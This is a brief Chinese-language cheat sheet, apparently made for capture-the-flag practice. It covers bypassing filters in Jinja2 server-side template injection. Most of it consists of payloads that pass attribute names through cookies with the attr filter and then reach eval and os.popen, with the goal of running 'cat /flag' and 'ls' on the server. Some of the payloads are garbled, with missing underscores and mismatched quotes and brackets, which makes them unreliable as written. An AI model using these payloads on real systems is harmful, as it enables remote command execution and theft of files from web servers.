attr获取变量 “”|attr(“class“) 相当于 “”.classrequest.cookies传参
?name={{ (x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5) }}
cookie传值
x1=init;x2=globals;x3=getitem;x4=builtins; x5=import(‘os’).popen(‘cat /flag’).read()
?name={{init.globals.getitem.builtins.eval(import__(‘os’).popen(‘cat /flag’).read())}}
{{()[request.args.class].bases[0].subclasses()[59].init.globals.builtins‘eval’.popen(‘ls’).read()”)}}